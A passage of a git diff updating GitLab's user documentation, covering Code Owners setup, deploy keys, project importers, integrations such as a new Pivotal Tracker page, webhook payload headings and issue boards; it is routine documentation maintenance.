paths in a repository. In larger organizations -or popular open source projects, Code Owners can help you understand -who to contact if you have a question about a specific portion of -the codebase. Code Owners can also streamline the merge request approval -process, identifying the most relevant reviewers and approvers for a -given change. +To set up Code Owners: -## How to set up Code Owners +1. Choose the location where you want to specify Code Owners: + - In the root directory of the repository + - In the `.gitlab/` directory + - In the `docs/` directory -You can use a `CODEOWNERS` file to specify users or -[shared groups](members/share_project_with_groups.md) -that are responsible for specific files and directories in a repository. +1. In that location, create a file named `CODEOWNERS`. + +1. In the file, enter text that follows one of these patterns: + + ```plaintext + # A member as Code Owner of a file + filename @username + + # A member as Code Owner of a directory + directory @username -You can choose to add the `CODEOWNERS` file in three places: + # All group members as Code Owners of a file + filename @groupname -- To the root directory of the repository -- Inside the `.gitlab/` directory -- Inside the `docs/` directory + # All group members as Code Owners of a directory + directory @groupname + ``` -The `CODEOWNERS` file is valid for the branch where it lives. For example, if you change the code owners -in a feature branch, the changes aren't valid in the main branch until the feature branch is merged. +The Code Owners are displayed in the UI by the files or directory they apply to. +These owners apply to this branch only. When you add new files to the repository, +you should update the `CODEOWNERS` file. -If you introduce new files to your repository and you want to identify the code owners for that file, -you must update `CODEOWNERS` accordingly. If you update the code owners when you are adding the files (in the same -branch), GitLab counts the owners as soon as the branch is merged. If -you don't, you can do that later, but your new files don't belong to anyone until you update your -`CODEOWNERS` file in the TARGET branch. +## When a file matches multiple `CODEOWNERS` entries When a file matches multiple entries in the `CODEOWNERS` file, -the users from last pattern matching the file are displayed on the -blob page of the given file. For example, you have the following -`CODEOWNERS` file: +the users from last pattern matching the file are used. + +For example, in the following `CODEOWNERS` file: ```plaintext README.md @user1 @@ -77,7 +77,7 @@ After you've added Code Owners to a project, you can configure it to be used for merge request approvals: - As [merge request eligible approvers](merge_requests/approvals/rules.md#code-owners-as-eligible-approvers). -- As required approvers for [protected branches](protected_branches.md#protected-branches-approval-by-code-owners). **(PREMIUM)** +- As required approvers for [protected branches](protected_branches.md#require-code-owner-approval-on-a-protected-branch). **(PREMIUM)** Developer or higher [permissions](../permissions.md) are required to approve a merge request. @@ -93,11 +93,11 @@ without using [Approval Rules](merge_requests/approvals/rules.md): 1. Create the file in one of the three locations specified above. 1. Set the code owners as required approvers for - [protected branches](protected_branches.md#protected-branches-approval-by-code-owners). -1. Use [the syntax of Code Owners files](code_owners.md#the-syntax-of-code-owners-files) + [protected branches](protected_branches.md#require-code-owner-approval-on-a-protected-branch). +1. Use [the syntax of Code Owners files](code_owners.md) to specify the actual owners and granular permissions. -Using Code Owners in conjunction with [protected branches](protected_branches.md#protected-branches-approval-by-code-owners) +Using Code Owners in conjunction with [protected branches](protected_branches.md#require-code-owner-approval-on-a-protected-branch) prevents any user who is not specified in the `CODEOWNERS` file from pushing changes for the specified files/paths, except those included in the **Allowed to push** column. This allows for a more inclusive push strategy, as @@ -107,20 +107,7 @@ Code Owners is required. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/35097) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.5, users and groups who are allowed to push to protected branches do not require a merge request to merge their feature branches. Thus, they can skip merge request approval rules, Code Owners included. -## The syntax of Code Owners files - -Files can be specified using the same kind of patterns you would use -in the `.gitignore` file followed by one or more of: - -- A user's `@username`. -- A user's email address. -- The `@name` of one or more groups that should be owners of the file. -- Lines starting with `#` are ignored. - -The path definition order is significant: the last pattern -matching a given path is used to find the code owners. - -### Groups as Code Owners +## Groups as Code Owners > - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53182) in GitLab 12.1. > - Group and subgroup hierarchy support was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/32432) in GitLab 13.0. diff --git a/doc/user/project/deploy_boards.md b/doc/user/project/deploy_boards.md index 89c82d4dc6f..a09448d4755 100644 --- a/doc/user/project/deploy_boards.md +++ b/doc/user/project/deploy_boards.md @@ -59,7 +59,7 @@ specific environment, there are a lot of use cases. To name a few: - You want to promote what's running in staging, to production. You go to the environments list, verify that what's running in staging is what you think is - running, then click on the [manual action](../../ci/yaml/README.md#whenmanual) to deploy to production. + running, then click on the [manual action](../../ci/yaml/index.md#whenmanual) to deploy to production. - You trigger a deploy, and you have many containers to upgrade so you know this takes a while (you've also throttled your deploy to only take down X containers at a time). But you need to tell someone when it's deployed, so you @@ -88,7 +88,7 @@ To display the Deploy Boards for a specific [environment](../../ci/environments/ [OpenShift docs](https://docs.openshift.com/container-platform/3.7/dev_guide/deployments/kubernetes_deployments.html#kubernetes-deployments-vs-deployment-configurations) and [GitLab issue #4584](https://gitlab.com/gitlab-org/gitlab/-/issues/4584). -1. [Configure GitLab Runner](../../ci/runners/README.md) with the [`docker`](https://docs.gitlab.com/runner/executors/docker.html) or +1. [Configure GitLab Runner](../../ci/runners/index.md) with the [`docker`](https://docs.gitlab.com/runner/executors/docker.html) or [`kubernetes`](https://docs.gitlab.com/runner/executors/kubernetes.html) executor. 1. Configure the [Kubernetes integration](clusters/index.md) in your project for the cluster. The Kubernetes namespace is of particular note as you need it @@ -165,6 +165,6 @@ version of your application. ## Further reading - [GitLab Auto deploy](../../topics/autodevops/stages.md#auto-deploy) -- [GitLab CI/CD variables](../../ci/variables/README.md) +- [GitLab CI/CD variables](../../ci/variables/index.md) - [Environments and deployments](../../ci/environments/index.md) - [Kubernetes deploy example](https://gitlab.com/gitlab-examples/kubernetes-deploy) diff --git a/doc/user/project/deploy_keys/index.md b/doc/user/project/deploy_keys/index.md index c0bc97781b6..1b9a17ee071 100644 --- a/doc/user/project/deploy_keys/index.md +++ b/doc/user/project/deploy_keys/index.md @@ -28,7 +28,7 @@ repository in automation, it's a simple solution. A drawback is that your repository could become vulnerable if a remote machine is compromised by a hacker. You should limit access to the remote machine before a deploy key is enabled on your repository. A good rule to follow is to provide access only to trusted users, -and make sure that the allowed users have the [Maintainer role or higher](../../permissions.md) +and make sure that the allowed users have at least the [Maintainer role](../../permissions.md) in the GitLab project. If this security implication is a concern for your organization, @@ -121,8 +121,9 @@ repositories to secure, shared services, such as CI/CD. Instance administrators can add public deploy keys: -1. Go to **Admin Area > Deploy Keys**. -1. Click on **New deploy key**. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Deploy Keys**. +1. Select **New deploy key**. Make sure your new key has a meaningful title, as it is the primary way for project maintainers and owners to identify the correct public deploy key to add. For example, diff --git a/doc/user/project/description_templates.md b/doc/user/project/description_templates.md index 711d7f561e4..72ef88b5fab 100644 --- a/doc/user/project/description_templates.md +++ b/doc/user/project/description_templates.md @@ -4,7 +4,7 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Description templates +# Description templates **(FREE)** We all know that a properly submitted issue is more likely to be addressed in a timely manner by the developers of a project. diff --git a/doc/user/project/file_lock.md b/doc/user/project/file_lock.md index eb963cb74c5..5ffde38b348 100644 --- a/doc/user/project/file_lock.md +++ b/doc/user/project/file_lock.md @@ -34,7 +34,7 @@ GitLab supports two different modes of file locking: ## Permissions Locks can be created by any person who has at least -[Developer permissions](../permissions.md) to the repository. +[Developer role](../permissions.md) in the repository. Only the user who locked the file or directory can edit locked files. Other users are prevented from modifying locked files by pushing, merging, diff --git a/doc/user/project/img/protected_branches_delete.png b/doc/user/project/img/protected_branches_delete.png Binary files differdeleted file mode 100644 index 8910ae9e39d..00000000000 --- a/doc/user/project/img/protected_branches_delete.png +++ /dev/null diff --git a/doc/user/project/img/protected_branches_deploy_keys_v13_5.png b/doc/user/project/img/protected_branches_deploy_keys_v13_5.png Binary files differdeleted file mode 100644 index ccd23dbe160..00000000000 --- a/doc/user/project/img/protected_branches_deploy_keys_v13_5.png +++ /dev/null diff --git a/doc/user/project/img/protected_branches_matches.png b/doc/user/project/img/protected_branches_matches.png Binary files differdeleted file mode 100644 index d7f2c8582fc..00000000000 --- a/doc/user/project/img/protected_branches_matches.png +++ /dev/null diff --git a/doc/user/project/img/protected_branches_select_roles_and_users.png b/doc/user/project/img/protected_branches_select_roles_and_users.png Binary files differdeleted file mode 100644 index 4f62b057cc7..00000000000 --- a/doc/user/project/img/protected_branches_select_roles_and_users.png +++ /dev/null diff --git a/doc/user/project/img/protected_branches_select_roles_and_users_list.png b/doc/user/project/img/protected_branches_select_roles_and_users_list.png Binary files differdeleted file mode 100644 index 519f2267496..00000000000 --- a/doc/user/project/img/protected_branches_select_roles_and_users_list.png +++ /dev/null diff --git a/doc/user/project/import/bitbucket_server.md b/doc/user/project/import/bitbucket_server.md index 963b9f524ff..7ccdb632c19 100644 --- a/doc/user/project/import/bitbucket_server.md +++ b/doc/user/project/import/bitbucket_server.md @@ -36,7 +36,7 @@ created as private in GitLab as well. - Attachments in Markdown are not imported. - Task lists are not imported. - Emoji reactions are not imported. -- Project filtering does not support fuzzy search (only `starts with` or `full match strings` are +- Project filtering does not support fuzzy search (only `starts with` or `full match strings` are supported). ## How it works @@ -51,7 +51,7 @@ The Bitbucket Server importer works as follows: ### User assignment When issues/pull requests are being imported, the Bitbucket importer tries to -find the author's e-mail address with a confirmed e-mail address in the GitLab +find the author's email address with a confirmed email address in the GitLab user database. If no such user is available, the project creator is set as the author. The importer appends a note in the comment to mark the original creator. diff --git a/doc/user/project/import/fogbugz.md b/doc/user/project/import/fogbugz.md index d3d77f16200..982bc6d90e8 100644 --- a/doc/user/project/import/fogbugz.md +++ b/doc/user/project/import/fogbugz.md @@ -7,31 +7,24 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Import your project from FogBugz to GitLab **(FREE)** -It only takes a few simple steps to import your project from FogBugz. -The importer imports all your cases and comments with original case -numbers and timestamps. You can also map FogBugz users to GitLab users. +Using the importer, you can import your FogBugz project to GitLab.com +or to your self-managed GitLab instance. -Follow these steps to import your project from FogBugz: +The importer imports all of your cases and comments with the original +case numbers and timestamps. You can also map FogBugz users to GitLab +users. -1. From your GitLab dashboard, select **New project**. +To import your project from FogBugz: +1. From your GitLab dashboard, select **New project**. 1. Select the **FogBugz** button. - -  - +  1. Enter your FogBugz URL, email address, and password. - -  - -1. Create mapping from FogBugz users to GitLab users. - -  - -1. Select the projects you wish to import by selecting the **Import** buttons. - -  - -1. Once the import finishes, click the link to go to the project +  +1. Create a mapping from FogBugz users to GitLab users. +  +1. Select **Import** for the projects you want to import. +  +1. After the import finishes, click the link to go to the project dashboard. Follow the directions to push your existing repository. - -  +  diff --git a/doc/user/project/import/github.md b/doc/user/project/import/github.md index 99b3e1acdcf..e67b6a45280 100644 --- a/doc/user/project/import/github.md +++ b/doc/user/project/import/github.md @@ -28,7 +28,7 @@ The following aspects of a project are imported: References to pull requests and issues are preserved (GitLab.com & 8.7+), and each imported repository maintains visibility level unless that [visibility -level is restricted](../../../public_access/public_access.md#restricting-the-use-of-public-or-internal-projects), +level is restricted](../../../public_access/public_access.md#restrict-use-of-public-or-internal-projects), in which case it defaults to the default project visibility. The namespace is a user or group in GitLab, such as `gitlab.com/janedoe` or `gitlab.com/customer-success`. You can do some bulk actions to move projects to different namespaces in the rails console. @@ -60,7 +60,7 @@ For this association to succeed, each GitHub author and assignee in the reposito must meet one of the following conditions prior to the import: - Have previously logged in to a GitLab account using the GitHub icon. -- Have a GitHub account with a [public-facing email address](https://docs.github.com/en/github/setting-up-and-managing-your-github-user-account/setting-your-commit-email-address) +- Have a GitHub account with a [public-facing email address](https://docs.github.com/en/github/setting-up-and-managing-your-github-user-account/managing-email-preferences/setting-your-commit-email-address) that matches their GitLab account's email address. NOTE: @@ -134,6 +134,9 @@ If you are not using the GitHub integration, you can still perform an authorizat 1. Hit the **List Your GitHub Repositories** button and wait while GitLab reads your repositories' information. Once done, you'll be taken to the importer page to select the repositories to import. +To use a newer personal access token in imports after previously performing these steps, sign out of +your GitLab account and sign in again, or revoke the older personal access token in GitHub. + ### Select which repositories to import After you have authorized access to your GitHub repositories, you are redirected to the GitHub importer page and @@ -160,6 +163,9 @@ Additionally, you can configure GitLab to send pipeline status updates back GitH If you import your project using [CI/CD for external repository](../../../ci/ci_cd_for_external_repos/index.md), then both of the above are automatically configured. **(PREMIUM)** +NOTE: +Mirroring does not sync any new or updated pull requests from your GitHub project. + ## Improve the speed of imports on self-managed instances NOTE: diff --git a/doc/user/project/import/index.md b/doc/user/project/import/index.md index 05fd04f6e48..dcc41c6c85e 100644 --- a/doc/user/project/import/index.md +++ b/doc/user/project/import/index.md @@ -49,7 +49,7 @@ When migrating to GitLab.com, you must create users manually unless [SCIM](../.. will be used. Creating users with the API is limited to self-managed instances as it requires administrator access. -To migrate all data from self-managed to GitLab.com, you can leverage the [API](../../../api/README.md). +To migrate all data from self-managed to GitLab.com, you can leverage the [API](../../../api/index.md). Migrate the assets in this order: 1. [Groups](../../../api/groups.md) @@ -74,6 +74,10 @@ best to [back up](../../../raketasks/backup_restore.md) the existing instance and restore it on the new instance. For example, this is useful when migrating a self-managed instance from an old server to a new server. +The backups produced don't depend on the operating system running GitLab. You can therefore use +the restore method to switch between different operating system distributions or versions, as long +as the same GitLab version [is available for installation](https://docs.gitlab.com/omnibus/package-information/deprecated_os.md). + To instead merge two self-managed GitLab instances together, use the instructions in [Migrate from self-managed GitLab to GitLab.com](#migrate-from-self-managed-gitlab-to-gitlabcom). This method is useful when both self-managed instances have existing data that must be preserved. diff --git a/doc/user/project/import/jira.md b/doc/user/project/import/jira.md index 4273f90c1e7..07419080d7d 100644 --- a/doc/user/project/import/jira.md +++ b/doc/user/project/import/jira.md @@ -4,7 +4,7 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Import your Jira project issues to GitLab +# Import your Jira project issues to GitLab **(PREMIUM)** > [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/2766) in GitLab 12.10. diff --git a/doc/user/project/index.md b/doc/user/project/index.md index 0dcbf997452..fca9c3e7023 100644 --- a/doc/user/project/index.md +++ b/doc/user/project/index.md @@ -65,7 +65,7 @@ Projects include the following [features](https://about.gitlab.com/features/): **GitLab CI/CD:** -- [GitLab CI/CD](../../ci/README.md): Use the built-in [Continuous Integration, Delivery, and Deployment](https://about.gitlab.com/blog/2016/08/05/continuous-integration-delivery-and-deployment-with-gitlab/) tool. +- [GitLab CI/CD](../../ci/index.md): Use the built-in [Continuous Integration, Delivery, and Deployment](https://about.gitlab.com/blog/2016/08/05/continuous-integration-delivery-and-deployment-with-gitlab/) tool. - [Container Registry](../packages/container_registry/index.md): Build and push Docker images. - [Auto Deploy](../../topics/autodevops/stages.md#auto-deploy): Configure GitLab CI/CD @@ -134,7 +134,7 @@ To review or contribute to the extension's code, visit [its codebase in GitLab]( ## Project APIs -There are numerous [APIs](../../api/README.md) to use with your projects: +There are numerous [APIs](../../api/index.md) to use with your projects: - [Badges](../../api/project_badges.md) - [Clusters](../../api/project_clusters.md) diff --git a/doc/user/project/integrations/github.md b/doc/user/project/integrations/github.md index 4f5640d9fff..019ca9da9f1 100644 --- a/doc/user/project/integrations/github.md +++ b/doc/user/project/integrations/github.md @@ -18,7 +18,7 @@ and is automatically configured on [GitHub import](../../../integration/github.m ## Configuration -This integration requires a [GitHub API token](https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token) +This integration requires a [GitHub API token](https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token) with `repo:status` access granted. Complete these steps on GitHub: diff --git a/doc/user/project/integrations/hangouts_chat.md b/doc/user/project/integrations/hangouts_chat.md index 0668e5dd88f..d5dc02d5455 100644 --- a/doc/user/project/integrations/hangouts_chat.md +++ b/doc/user/project/integrations/hangouts_chat.md @@ -36,7 +36,7 @@ Select a room and create a webhook: 1. Select **Save**. 1. Copy the webhook URL. -For further details, see [the Google Chat documentation for configuring webhooks](https://developers.google.com/hangouts/chat/how-tos/webhooks). +For further details, see [the Google Chat documentation for configuring webhooks](https://developers.google.com/chat/how-tos/webhooks). ## In GitLab diff --git a/doc/user/project/integrations/img/project_integrations_v13_3.png b/doc/user/project/integrations/img/project_integrations_v13_3.png Binary files differdeleted file mode 100644 index 9c925d32441..00000000000 --- a/doc/user/project/integrations/img/project_integrations_v13_3.png +++ /dev/null diff --git a/doc/user/project/integrations/jira_cloud_configuration.md b/doc/user/project/integrations/jira_cloud_configuration.md deleted file mode 100644 index c9ab4532760..00000000000 --- a/doc/user/project/integrations/jira_cloud_configuration.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../../../integration/jira/jira_cloud_configuration.md' -remove_date: '2021-06-18' ---- - -This document was moved to [another location](../../../integration/jira/jira_cloud_configuration.md). - -<!-- This redirect file can be deleted after <2021-06-18>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/user/project/integrations/jira_server_configuration.md b/doc/user/project/integrations/jira_server_configuration.md deleted file mode 100644 index de6eec62b96..00000000000 --- a/doc/user/project/integrations/jira_server_configuration.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../../../integration/jira/jira_server_configuration.md' -remove_date: '2021-06-18' ---- - -This document was moved to [another location](../../../integration/jira/jira_server_configuration.md). - -<!-- This redirect file can be deleted after <2021-06-18>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/user/project/integrations/mattermost_slash_commands.md b/doc/user/project/integrations/mattermost_slash_commands.md index 834bf15c287..619ae52481b 100644 --- a/doc/user/project/integrations/mattermost_slash_commands.md +++ b/doc/user/project/integrations/mattermost_slash_commands.md @@ -141,7 +141,7 @@ The available slash commands for Mattermost are: | ------- | ----------- | ------- | | <kbd>/<trigger> issue new <title> <kbd>⇧ Shift</kbd>+<kbd>↵ Enter</kbd> <description></kbd> | Create a new issue in the project that `<trigger>` is tied to. `<description>` is optional. | `/gitlab issue new We need to change the homepage` | | <kbd>/<trigger> issue show <issue-number></kbd> | Show the issue with ID `<issue-number>` from the project that `<trigger>` is tied to. | `/gitlab issue show 42` | -| <kbd>/<trigger> deploy <environment> to <environment></kbd> | Start the CI job that deploys from one environment to another, for example `staging` to `production`. CI/CD must be [properly configured](../../../ci/yaml/README.md). | `/gitlab deploy staging to production` | +| <kbd>/<trigger> deploy <environment> to <environment></kbd> | Start the CI job that deploys from one environment to another, for example `staging` to `production`. CI/CD must be [properly configured](../../../ci/yaml/index.md). | `/gitlab deploy staging to production` | To see a list of available commands to interact with GitLab, type the trigger word followed by <kbd>help</kbd>. Example: `/gitlab help` diff --git a/doc/user/project/integrations/overview.md b/doc/user/project/integrations/overview.md index b0ae290e7cd..53aa9da30ab 100644 --- a/doc/user/project/integrations/overview.md +++ b/doc/user/project/integrations/overview.md @@ -15,11 +15,9 @@ functionality to GitLab. You can find the available integrations under your project's **Settings > Integrations** page. -There are more than 20 integrations to integrate with. Click on the one that you +There are more than 20 integrations to integrate with. Select the one that you want to configure. - - ## Integrations listing Click on the service links to see further configuration instructions and details. @@ -34,6 +32,7 @@ Click on the service links to see further configuration instructions and details | Campfire | Connect to chat. | **{dotted-circle}** No | | [Confluence Workspace](../../../api/services.md#confluence-service) | Replace the link to the internal wiki with a link to a Confluence Cloud Workspace. | **{dotted-circle}** No | | [Custom issue tracker](custom_issue_tracker.md) | Use a custom issue tracker. | **{dotted-circle}** No | +| [Datadog](../../../integration/datadog.md) | Trace your GitLab pipelines with Datadog. | **{check-circle}** Yes | | [Discord Notifications](discord_notifications.md) | Send notifications about project events to a Discord channel. | **{dotted-circle}** No | | Drone CI | Run CI/CD pipelines with Drone. | **{check-circle}** Yes | | [Emails on push](emails_on_push.md) | Send commits and diff of each push by email. | **{dotted-circle}** No | @@ -51,7 +50,7 @@ Click on the service links to see further configuration instructions and details | [Microsoft Teams notifications](microsoft_teams.md) | Receive event notifications. | **{dotted-circle}** No | | Packagist | Update your projects. | **{check-circle}** Yes | | Pipelines emails | Send the pipeline status to a list of recipients by email. | **{dotted-circle}** No | -| PivotalTracker | Use PivotalTracker as the issue tracker. | **{dotted-circle}** No | +| [Pivotal Tracker](pivotal_tracker.md) | Add commit messages as comments to Pivotal Tracker stories. | **{dotted-circle}** No | | [Prometheus](prometheus.md) | Monitor application metrics. | **{dotted-circle}** No | | Pushover | Get real-time notifications on your device. | **{dotted-circle}** No | | [Redmine](redmine.md) | Use Redmine as the issue tracker. | **{dotted-circle}** No | @@ -115,6 +114,6 @@ plugins. This allows the community to keep the plugins up to date so that they always work in newer GitLab versions. For an overview of what integrations are available, please see the -[project_services source directory](https://gitlab.com/gitlab-org/gitlab/-/tree/master/app/models/project_services). +[integrations source directory](https://gitlab.com/gitlab-org/gitlab/-/tree/master/app/models/integrations). Contributions are welcome! diff --git a/doc/user/project/integrations/pivotal_tracker.md b/doc/user/project/integrations/pivotal_tracker.md new file mode 100644 index 00000000000..c2c827c240b --- /dev/null +++ b/doc/user/project/integrations/pivotal_tracker.md @@ -0,0 +1,47 @@ +--- +stage: Create +group: Ecosystem +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Pivotal Tracker service **(FREE)** + +This service adds commit messages as comments to Pivotal Tracker stories. + +Once enabled, commit messages are checked for square brackets containing a hash mark followed by +the story ID (for example, `[#555]`). Every story ID found gets the commit comment added to it. + +You can also close a story with a message containing: `fix [#555]`. +You can use any of these words: + +- `fix` +- `fixed` +- `fixes` +- `complete` +- `completes` +- `completed` +- `finish` +- `finished` +- `finishes` +- `delivers` + +Read more about the +[Source Commits endpoint](https://www.pivotaltracker.com/help/api/rest/v5#Source_Commits) in +the Pivotal Tracker API documentation. + +See also the [Pivotal Tracker service API documentation](../../../api/services.md#pivotal-tracker). + +## Set up Pivotal Tracker + +In Pivotal Tracker, [create an API token](https://www.pivotaltracker.com/help/articles/api_token/). + +Complete these steps in GitLab: + +1. Go to the project you want to configure. +1. Go to the [Integrations page](overview.md#accessing-integrations). +1. Select **Pivotal Tracker**. +1. Ensure that the **Active** toggle is enabled. +1. Paste the token you generated in Pivotal Tracker. +1. (Optional) To restrict this setting to specific branches, list them in the **Restrict to branch** + field, separated with commas. +1. Select **Save changes** or optionally select **Test settings**. diff --git a/doc/user/project/integrations/prometheus_library/index.md b/doc/user/project/integrations/prometheus_library/index.md index 584c0898fec..fe74ea6834b 100644 --- a/doc/user/project/integrations/prometheus_library/index.md +++ b/doc/user/project/integrations/prometheus_library/index.md @@ -35,6 +35,6 @@ In order to isolate and only display relevant metrics for a given environment, GitLab needs a method to detect which labels are associated. To do that, GitLab uses the defined queries and fills in the environment specific variables. Typically this involves looking for the -[`$CI_ENVIRONMENT_SLUG`](../../../../ci/variables/README.md#predefined-cicd-variables), +[`$CI_ENVIRONMENT_SLUG`](../../../../ci/variables/index.md#predefined-cicd-variables), but may also include other information such as the project's Kubernetes namespace. Each search query is defined in the [exporter specific documentation](#exporters). diff --git a/doc/user/project/integrations/prometheus_library/kubernetes.md b/doc/user/project/integrations/prometheus_library/kubernetes.md index 1bafa4938af..ea0119f2e94 100644 --- a/doc/user/project/integrations/prometheus_library/kubernetes.md +++ b/doc/user/project/integrations/prometheus_library/kubernetes.md @@ -40,7 +40,7 @@ Prometheus needs to be deployed into the cluster and configured properly in orde In order to isolate and only display relevant CPU and Memory metrics for a given environment, GitLab needs a method to detect which containers it is running. Because these metrics are tracked at the container level, traditional Kubernetes labels are not available. -Instead, the [Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/) or [DaemonSet](https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/) name should begin with [CI_ENVIRONMENT_SLUG](../../../../ci/variables/README.md#predefined-cicd-variables). It can be followed by a `-` and additional content if desired. For example, a deployment name of `review-homepage-5620p5` would match the `review/homepage` environment. +Instead, the [Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/) or [DaemonSet](https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/) name should begin with [CI_ENVIRONMENT_SLUG](../../../../ci/variables/index.md#predefined-cicd-variables). It can be followed by a `-` and additional content if desired. For example, a deployment name of `review-homepage-5620p5` would match the `review/homepage` environment. ## Displaying Canary metrics **(PREMIUM)** diff --git a/doc/user/project/integrations/webex_teams.md b/doc/user/project/integrations/webex_teams.md index 05515c58161..2851fe0b299 100644 --- a/doc/user/project/integrations/webex_teams.md +++ b/doc/user/project/integrations/webex_teams.md @@ -13,7 +13,7 @@ You can configure GitLab to send notifications to a Webex Teams space: ## Create a webhook for the space -1. Go to the [Incoming Webhooks app page](https://apphub.webex.com/messaging/applications/incoming-webhooks-cisco-systems-38054). +1. Go to the [Incoming Webhooks app page](https://apphub.webex.com/applications/incoming-webhooks-cisco-systems-38054). 1. Select **Connect** and log in to Webex Teams, if required. 1. Enter a name for the webhook and select the space to receive the notifications. 1. Select **ADD**. diff --git a/doc/user/project/integrations/webhooks.md b/doc/user/project/integrations/webhooks.md index 406b1e9ba6b..01f3424d993 100644 --- a/doc/user/project/integrations/webhooks.md +++ b/doc/user/project/integrations/webhooks.md @@ -112,7 +112,7 @@ branches, this hook isn't executed. X-Gitlab-Event: Push Hook ``` -**Request body:** +**Payload example:** ```json { @@ -202,7 +202,7 @@ tags, this hook is not executed. X-Gitlab-Event: Tag Push Hook ``` -**Request body:** +**Payload example:** ```json { @@ -256,7 +256,14 @@ Triggered when a new issue is created or an existing issue was updated/closed/re X-Gitlab-Event: Issue Hook ``` -**Request body:** +**Available `object_attributes.action`:** + +- `open` +- `close` +- `reopen` +- `update` + +**Payload example:** ```json { @@ -423,7 +430,7 @@ Valid target types: X-Gitlab-Event: Note Hook ``` -**Request body:** +**Payload example:** ```json { @@ -505,7 +512,7 @@ X-Gitlab-Event: Note Hook X-Gitlab-Event: Note Hook ``` -**Request body:** +**Payload example:** ```json { @@ -634,7 +641,7 @@ X-Gitlab-Event: Note Hook X-Gitlab-Event: Note Hook ``` -**Request body:** +**Payload example:** ```json { @@ -742,7 +749,7 @@ NOTE: X-Gitlab-Event: Note Hook ``` -**Request body:** +**Payload example:** ```json { @@ -820,7 +827,17 @@ Triggered when a new merge request is created, an existing merge request was upd X-Gitlab-Event: Merge Request Hook ``` -**Request body:** +**Available `object_attributes.action`:** + +- `open` +- `close` +- `reopen` +- `update` +- `approved` +- `unapproved` +- `merge` + +**Payload example:** ```json { @@ -983,7 +1000,7 @@ Triggered when a wiki page is created, updated or deleted. X-Gitlab-Event: Wiki Page Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1044,7 +1061,7 @@ Triggered on status change of Pipeline. X-Gitlab-Event: Pipeline Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1291,7 +1308,7 @@ Triggered on status change of a job. X-Gitlab-Event: Job Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1340,7 +1357,7 @@ X-Gitlab-Event: Job Hook }, "runner": { "active": true, - "runner_type": "project_type", + "runner_type": "project_type", "is_shared": false, "id": 380987, "description": "shared-runners-manager-6.gitlab.com", @@ -1370,7 +1387,7 @@ Triggered when a deployment: X-Gitlab-Event: Deployment Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1433,7 +1450,7 @@ Member events are triggered when: X-Gitlab-Event: Member Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1461,7 +1478,7 @@ X-Gitlab-Event: Member Hook X-Gitlab-Event: Member Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1489,7 +1506,7 @@ X-Gitlab-Event: Member Hook X-Gitlab-Event: Member Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1526,7 +1543,7 @@ Subgroup events are triggered when: X-Gitlab-Event: Subgroup Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1554,7 +1571,7 @@ X-Gitlab-Event: Subgroup Hook X-Gitlab-Event: Subgroup Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1587,7 +1604,7 @@ Triggered when a feature flag is turned on or off. X-Gitlab-Event: Feature Flag Hook ``` -**Request Body**: +**Payload example**: ```json { @@ -1637,7 +1654,12 @@ Triggered when a release is created or updated. X-Gitlab-Event: Release Hook ``` -**Request Body**: +**Available `object_attributes.action`:** + +- `create` +- `update` + +**Payload example**: ```json { @@ -1762,6 +1784,10 @@ On this page, you can see data that GitLab sends (request headers and body) and From this page, you can repeat delivery with the same data by clicking `Resend Request` button. NOTE: +This history is unavailable for Group-level webhooks. For more information, read +[issue #325642](https://gitlab.com/gitlab-org/gitlab/-/issues/325642). + +NOTE: If URL or secret token of the webhook were updated, data is delivered to the new address. ### Webhook fails or multiple webhook requests are triggered diff --git a/doc/user/project/issue_board.md b/doc/user/project/issue_board.md index 8f71d469e34..a32a8ed8ec7 100644 --- a/doc/user/project/issue_board.md +++ b/doc/user/project/issue_board.md @@ -97,8 +97,8 @@ For examples of using issue boards along with [epics](../group/epics/index.md), ### Use cases for a single issue board -With the GitLab Workflow you can discuss proposals in issues, label -them, and organize and prioritize them with issue boards. +With the [GitLab Flow](https://about.gitlab.com/topics/version-control/what-is-gitlab-flow/) you can +discuss proposals in issues, label them, and organize and prioritize them with issue boards. For example, let's consider this simplified development workflow: @@ -154,7 +154,7 @@ for them. NOTE: For a broader use case, please see the blog post -[GitLab Workflow, an Overview](https://about.gitlab.com/topics/version-control/what-is-gitlab-workflow/#gitlab-workflow-a-use-case-scenario). +[What is GitLab Flow?](https://about.gitlab.com/topics/version-control/what-is-gitlab-flow/). For a real use case example, you can read why [Codepen decided to adopt issue boards](https://about.gitlab.com/blog/2017/01/27/codepen-welcome-to-gitlab/#project-management-everything-in-one-place) to improve their workflow with multiple boards. @@ -426,7 +426,7 @@ To set a WIP limit for a list: 1. Enter the maximum number of issues. 1. 